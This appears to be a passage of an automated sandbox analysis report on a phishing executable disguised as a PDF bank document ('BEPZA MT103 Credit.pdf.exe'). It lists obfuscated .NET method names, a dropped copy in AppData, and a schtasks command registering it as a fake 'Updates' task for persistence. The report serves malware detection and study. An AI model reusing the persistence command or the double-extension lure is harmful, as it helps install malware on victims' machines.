                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, q3XwxeHE3wtcqHlLbH.csHigh entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, BhwjN4CoqiKd9WhjTAN.csHigh entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, paZWfdzUnnsDNcXHe9.csHigh entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, dkTFxqCCeLQYu7pD8nM.csHigh entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, WCNuVMYuSEVTHy8bH7.csHigh entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, h7nrZ0E3lRQtVg8uOM.csHigh entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.csHigh entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, y6b8FRlSR6PSYKhFPw.csHigh entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, QPUYnACfL7r4DkBL9YF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, nUBjUWrYcwnrjp5cwr.csHigh entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, gPDJgDfUH82JajhHPO.csHigh entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, wPcggfXarRGHwfdcKr.csHigh entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cLTVWI0Z4SQaHe7mK7.csHigh entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.csHigh entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, HTZDqbGRORNdQopHe8.csHigh entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, hceRmTCWrN6wH7cI3N6.csHigh entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, s8Y1y0Mi9WcOG0mTH1.csHigh entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, uE5RalB2ln8b0n8Wbv.csHigh entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cvRFX3AvwS2op08hje.csHigh entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, OFmwd81ndwdfW0m9Y4.csHigh entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, mjcVcEUwoMYpYuk49f.csHigh entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, Cw8mvfWKUJllqoD5N5.csHigh entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, IeGoKjTYbK74xTl5pA.csHigh entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, I7NNcAw8mv7vF81q9x.csHigh entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, q3XwxeHE3wtcqHlLbH.csHigh entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, BhwjN4CoqiKd9WhjTAN.csHigh entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, paZWfdzUnnsDNcXHe9.csHigh entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, dkTFxqCCeLQYu7pD8nM.csHigh entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, WCNuVMYuSEVTHy8bH7.csHigh entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, h7nrZ0E3lRQtVg8uOM.csHigh entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.csHigh entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, y6b8FRlSR6PSYKhFPw.csHigh entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, QPUYnACfL7r4DkBL9YF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, nUBjUWrYcwnrjp5cwr.csHigh entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, gPDJgDfUH82JajhHPO.csHigh entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, wPcggfXarRGHwfdcKr.csHigh entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cLTVWI0Z4SQaHe7mK7.csHigh entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.csHigh entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, HTZDqbGRORNdQopHe8.csHigh entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, hceRmTCWrN6wH7cI3N6.csHigh entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, s8Y1y0Mi9WcOG0mTH1.csHigh entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, uE5RalB2ln8b0n8Wbv.csHigh entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cvRFX3AvwS2op08hje.csHigh entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, OFmwd81ndwdfW0m9Y4.csHigh entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, mjcVcEUwoMYpYuk49f.csHigh entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, Cw8mvfWKUJllqoD5N5.csHigh entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, IeGoKjTYbK74xTl5pA.csHigh entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, I7NNcAw8mv7vF81q9x.csHigh entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, P3eh8af2o4VTkSD0Y3.csHigh entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.csHigh entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, ihTFxFFnSRQetgx2gS.csHigh entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
                    Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, P3eh8af2o4VTkSD0Y3.csHigh entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
                    Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.csHigh entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
                    Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, ihTFxFFnSRQetgx2gS.csHigh entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeFile created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: Possible double extension: pdf.exeStatic PE information: BEPZA MT103 Credit.pdf.exe
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
